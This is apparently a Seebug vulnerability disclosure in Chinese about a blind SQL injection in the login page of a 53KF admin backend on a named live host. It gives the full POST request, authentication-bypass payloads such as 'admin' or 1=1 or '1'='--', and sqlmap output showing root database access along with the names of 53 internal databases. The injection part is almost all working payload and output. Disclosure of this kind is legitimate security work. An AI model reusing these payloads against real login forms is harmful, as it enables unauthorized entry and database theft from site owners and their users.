53KF某后台MySQL盲注(root)

2015-05-19T00:00:00
ID SSV:94377
Type seebug
Reporter Root
Modified 2015-05-19T00:00:00

Description

简要描述:

53KF某后台MySQL盲注(root)

详细说明:

注射点:

POST /check.php HTTP/1.1 Content-Length: 166 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://hlm.53kf.com Host: hlm.53kf.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4 Accept: */* Submit=&action=login&name=admin' or 1=1* or '1aa'='1&pwd=test

name可注入,本身是很简单的注入,SQLmap设定--risk=3竟然跑不出来。于是构造了下参数让注入更明显一点:

admin' or 1=1* or '1aa'='1

漏洞证明:

用户名输入: admin' or 1=1 or '1'='-- 可以直接登陆后台:

<img src="https://images.seebug.org/upload/201505/19211236bc51c5bf24c0d02c8c96cccc0dc3f7a6.png" alt="53kf.png" width="600" onerror="javascript:errimg(this);">

让SQLmap跑一下:

current user: 'root@localhost' current database: 'hlm' available databases [53]: [*] `13jian` [*] bak [*] entalk [*] hk_kf [*] hk_kf1 [*] hk_talk [*] hlm [*] income [*] information_schema [*] ip [*] ip2 [*] ip_110711 [*] ip_src [*] kf [*] kf1 [*] mysql [*] oem [*] oem_168kf_kf [*] oem_168kf_kf1 [*] oem_168kf_talk [*] oem_del [*] oem_ekt_kf [*] oem_ekt_kf1 [*] oem_ekt_talk [*] oem_old [*] oem_test [*] oem_tzchat_kf [*] oem_tzchat_kf1 [*] oem_tzchat_kf1_new [*] oem_tzchat_kf_new [*] oem_tzchat_talk [*] oem_tzchat_talk_new [*] oem_wb_kf [*] oem_wb_kf1 [*] oem_wb_talk [*] oem_yitian_kf [*] oem_yitian_kf1 [*] oem_yitian_kf1_new [*] oem_yitian_kf_new [*] oem_yitian_talk [*] oem_yitian_talk_new [*] oem_ywdj_kf [*] oem_ywdj_kf1 [*] oem_ywdj_talk [*] srv_kf [*] srv_kf1 [*] srv_talk [*] stat [*] talk [*] test [*] tw [*] tw1 [*] twtalk